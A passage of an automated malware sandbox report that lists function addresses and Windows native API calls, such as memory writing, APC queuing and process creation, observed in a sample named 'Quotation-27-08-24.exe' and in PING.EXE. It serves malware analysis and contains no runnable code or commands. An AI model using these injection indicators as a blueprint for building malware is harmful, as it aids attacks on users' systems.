            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA2D10 NtMapViewOfSection,4_2_00FA2D10
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA2D00 NtSetInformationFile,4_2_00FA2D00
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA2EE0 NtQueueApcThread,4_2_00FA2EE0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA2EA0 NtAdjustPrivilegesToken,4_2_00FA2EA0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA2E80 NtReadVirtualMemory,4_2_00FA2E80
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA2E30 NtWriteVirtualMemory,4_2_00FA2E30
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA2FE0 NtCreateFile,4_2_00FA2FE0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA2FB0 NtResumeThread,4_2_00FA2FB0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA2FA0 NtQuerySection,4_2_00FA2FA0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA2F90 NtProtectVirtualMemory,4_2_00FA2F90
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA2F60 NtCreateProcessEx,4_2_00FA2F60
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA2F30 NtCreateSection,4_2_00FA2F30
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA3090 NtSetValueKey,4_2_00FA3090
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA3010 NtOpenDirectoryObject,4_2_00FA3010
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA39B0 NtGetContextThread,4_2_00FA39B0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA3D70 NtOpenThread,4_2_00FA3D70
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA3D10 NtOpenProcessToken,4_2_00FA3D10
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C14340 NtSetContextThread,LdrInitializeThunk,9_2_02C14340
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C14650 NtSuspendThread,LdrInitializeThunk,9_2_02C14650
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C12AD0 NtReadFile,LdrInitializeThunk,9_2_02C12AD0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C12AF0 NtWriteFile,LdrInitializeThunk,9_2_02C12AF0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C12B60 NtClose,LdrInitializeThunk,9_2_02C12B60
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C12EE0 NtQueueApcThread,LdrInitializeThunk,9_2_02C12EE0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C12FE0 NtCreateFile,LdrInitializeThunk,9_2_02C12FE0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C12FB0 NtResumeThread,LdrInitializeThunk,9_2_02C12FB0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C12F30 NtCreateSection,LdrInitializeThunk,9_2_02C12F30
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C12CA0 NtQueryInformationToken,LdrInitializeThunk,9_2_02C12CA0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C12C60 NtCreateKey,LdrInitializeThunk,9_2_02C12C60
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C12C70 NtFreeVirtualMemory,LdrInitializeThunk,9_2_02C12C70
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C12DD0 NtDelayExecution,LdrInitializeThunk,9_2_02C12DD0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C12DF0 NtQuerySystemInformation,LdrInitializeThunk,9_2_02C12DF0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C12D10 NtMapViewOfSection,LdrInitializeThunk,9_2_02C12D10
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C12D30 NtUnmapViewOfSection,LdrInitializeThunk,9_2_02C12D30
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C135C0 NtCreateMutant,LdrInitializeThunk,9_2_02C135C0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C139B0 NtGetContextThread,LdrInitializeThunk,9_2_02C139B0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C12AB0 NtWaitForSingleObject,9_2_02C12AB0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C12BE0 NtQueryValueKey,9_2_02C12BE0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C12BF0 NtAllocateVirtualMemory,9_2_02C12BF0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C12B80 NtQueryInformationFile,9_2_02C12B80
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C12BA0 NtEnumerateValueKey,9_2_02C12BA0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C12E80 NtReadVirtualMemory,9_2_02C12E80
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C12EA0 NtAdjustPrivilegesToken,9_2_02C12EA0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C12E30 NtWriteVirtualMemory,9_2_02C12E30
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C12F90 NtProtectVirtualMemory,9_2_02C12F90
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C12FA0 NtQuerySection,9_2_02C12FA0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C12F60 NtCreateProcessEx,9_2_02C12F60
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C12CC0 NtQueryVirtualMemory,9_2_02C12CC0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C12CF0 NtOpenProcess,9_2_02C12CF0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C12C00 NtQueryInformationProcess,9_2_02C12C00
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C12DB0 NtEnumerateKey,9_2_02C12DB0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C12D00 NtSetInformationFile,9_2_02C12D00
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C13090 NtSetValueKey,9_2_02C13090
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C13010 NtOpenDirectoryObject,9_2_02C13010
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C13D70 NtOpenThread,9_2_02C13D70
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C13D10 NtOpenProcessToken,9_2_02C13D10
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_00498B10 NtCreateFile,9_2_00498B10
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_00498C80 NtReadFile,9_2_00498C80
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_00498D70 NtDeleteFile,9_2_00498D70
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_00498E10 NtClose,9_2_00498E10
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 0_2_014070300_2_01407030
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 0_2_014090280_2_01409028
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 0_2_05380E580_2_05380E58
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 0_2_053818180_2_05381818
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 0_2_053818080_2_05381808
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 0_2_053BE6600_2_053BE660
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 0_2_053BFDE00_2_053BFDE0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 0_2_053BFDC30_2_053BFDC3
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 0_2_073F03A00_2_073F03A0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 0_2_073F40080_2_073F4008
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 0_2_073F75000_2_073F7500
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 0_2_073F95580_2_073F9558
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 0_2_073F95530_2_073F9553
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 0_2_073FD4200_2_073FD420
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 0_2_073F03900_2_073F0390
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 0_2_073F90480_2_073F9048
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 0_2_073F70C80_2_073F70C8
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 0_2_073F3FF80_2_073F3FF8
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 0_2_073F6C900_2_073F6C90
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 0_2_073F6C8B0_2_073F6C8B
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_004183F34_2_004183F3
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_004029104_2_00402910
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0042EA734_2_0042EA73
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_004033B04_2_004033B0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0040FC534_2_0040FC53
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_004165CE4_2_004165CE
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_004165D34_2_004165D3
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0040FE734_2_0040FE73
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00402E1C4_2_00402E1C
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00402E204_2_00402E20
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_004026294_2_00402629
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_004026304_2_00402630
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0040DEF34_2_0040DEF3
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0100A1184_2_0100A118
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_010301AA4_2_010301AA
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_010281CC4_2_010281CC
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_010020004_2_01002000
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FF81584_2_00FF8158
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F601004_2_00F60100
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FF02C04_2_00FF02C0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0102A3524_2_0102A352
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_010303E64_2_010303E6
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F7E3F04_2_00F7E3F0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_010102744_2_01010274
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_010305914_2_01030591
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_010144204_2_01014420
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_010224464_2_01022446
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F705354_2_00F70535
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0101E4F64_2_0101E4F6
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F8C6E04_2_00F8C6E0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F6C7C04_2_00F6C7C0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F707704_2_00F70770
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F947504_2_00F94750
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F9E8F04_2_00F9E8F0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F568B84_2_00F568B8
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0103A9A64_2_0103A9A6
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F728404_2_00F72840
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F7A8404_2_00F7A840
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F729A04_2_00F729A0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F869624_2_00F86962
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0102AB404_2_0102AB40
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F6EA804_2_00F6EA80
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_01026BD74_2_01026BD7
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F60CF24_2_00F60CF2
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0100CD1F4_2_0100CD1F
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F70C004_2_00F70C00
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F6ADE04_2_00F6ADE0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F88DBF4_2_00F88DBF
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_01010CB54_2_01010CB5
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F7AD004_2_00F7AD00
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_01012F304_2_01012F30
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F82E904_2_00F82E90
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F70E594_2_00F70E59
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F7CFE04_2_00F7CFE0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0102EE264_2_0102EE26
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F62FC84_2_00F62FC8
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FEEFA04_2_00FEEFA0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0102CE934_2_0102CE93
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE4F404_2_00FE4F40
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F90F304_2_00F90F30
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FB2F284_2_00FB2F28
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0102EEDB4_2_0102EEDB
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F770C04_2_00F770C0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0103B16B4_2_0103B16B
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F7B1B04_2_00F7B1B0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F5F1724_2_00F5F172
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA516C4_2_00FA516C
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0101F0CC4_2_0101F0CC
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0102F0E04_2_0102F0E0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_010270E94_2_010270E9
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0102132D4_2_0102132D
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F8B2C04_2_00F8B2C0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F752A04_2_00F752A0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FB739A4_2_00FB739A
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F5D34C4_2_00F5D34C
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_010112ED4_2_010112ED
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_010275714_2_01027571
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F614604_2_00F61460
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0100D5B04_2_0100D5B0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0102F43F4_2_0102F43F
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0102F7B04_2_0102F7B0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_010216CC4_2_010216CC
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_010059104_2_01005910
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F738E04_2_00F738E0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FDD8004_2_00FDD800
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F799504_2_00F79950
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F8B9504_2_00F8B950
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FB5AA04_2_00FB5AA0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0102FB764_2_0102FB76
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE3A6C4_2_00FE3A6C
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FADBF94_2_00FADBF9
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE5BF04_2_00FE5BF0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_01027A464_2_01027A46
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0102FA494_2_0102FA49
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F8FB804_2_00F8FB80
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_01011AA34_2_01011AA3
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0100DAAC4_2_0100DAAC
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0101DAC64_2_0101DAC6
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_01021D5A4_2_01021D5A
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_01027D734_2_01027D73
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE9C324_2_00FE9C32
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F8FDC04_2_00F8FDC0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F73D404_2_00F73D40
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0102FCF24_2_0102FCF2
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0102FF094_2_0102FF09
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F79EB04_2_00F79EB0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0102FFB14_2_0102FFB1
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F33FD24_2_00F33FD2
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F33FD54_2_00F33FD5
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F71F924_2_00F71F92
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exeCode function: 8_2_02997B508_2_02997B50
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exeCode function: 8_2_029A02818_2_029A0281
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exeCode function: 8_2_029A02868_2_029A0286
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exeCode function: 8_2_02997BA68_2_02997BA6
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exeCode function: 8_2_02999B268_2_02999B26
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exeCode function: 8_2_029999068_2_02999906
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exeCode function: 8_2_029B87268_2_029B8726
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exeCode function: 8_2_0583A4F98_2_0583A4F9
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exeCode function: 8_2_058207B98_2_058207B9
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exeCode function: 8_2_0581B6D98_2_0581B6D9
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exeCode function: 8_2_05823E798_2_05823E79
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exeCode function: 8_2_058199798_2_05819979
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exeCode function: 8_2_0581B8F98_2_0581B8F9
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exeCode function: 8_2_058220548_2_05822054
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exeCode function: 8_2_058220598_2_05822059
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C602C09_2_02C602C0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C802749_2_02C80274
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02CA03E69_2_02CA03E6
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02BEE3F09_2_02BEE3F0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C9A3529_2_02C9A352
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C720009_2_02C72000
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C981CC9_2_02C981CC
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02CA01AA9_2_02CA01AA
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C681589_2_02C68158
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02BD01009_2_02BD0100
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C7A1189_2_02C7A118
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02BFC6E09_2_02BFC6E0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02BDC7C09_2_02BDC7C0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C047509_2_02C04750
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02BE07709_2_02BE0770
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C8E4F69_2_02C8E4F6
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C924469_2_02C92446
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C844209_2_02C84420
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02CA05919_2_02CA0591
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02BE05359_2_02BE0535
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02BDEA809_2_02BDEA80
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C96BD79_2_02C96BD7
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C9AB409_2_02C9AB40
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02BC68B89_2_02BC68B8
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C0E8F09_2_02C0E8F0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02BEA8409_2_02BEA840
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02BE28409_2_02BE2840
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02BE29A09_2_02BE29A0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02CAA9A69_2_02CAA9A6
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02BF69629_2_02BF6962
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C9EEDB9_2_02C9EEDB
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02BF2E909_2_02BF2E90
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C9CE939_2_02C9CE93
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02BE0E599_2_02BE0E59
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C9EE269_2_02C9EE26
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02BECFE09_2_02BECFE0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C5EFA09_2_02C5EFA0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02BD2FC89_2_02BD2FC8
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C54F409_2_02C54F40
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C22F289_2_02C22F28
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C00F309_2_02C00F30
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C82F309_2_02C82F30
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02BD0CF29_2_02BD0CF2
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C80CB59_2_02C80CB5
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02BE0C009_2_02BE0C00
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02BF8DBF9_2_02BF8DBF
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02BDADE09_2_02BDADE0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02BEAD009_2_02BEAD00
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C7CD1F9_2_02C7CD1F
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02BE52A09_2_02BE52A0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C812ED9_2_02C812ED
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02BFB2C09_2_02BFB2C0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C2739A9_2_02C2739A
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C9132D9_2_02C9132D
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02BCD34C9_2_02BCD34C
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C8F0CC9_2_02C8F0CC
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C970E99_2_02C970E9
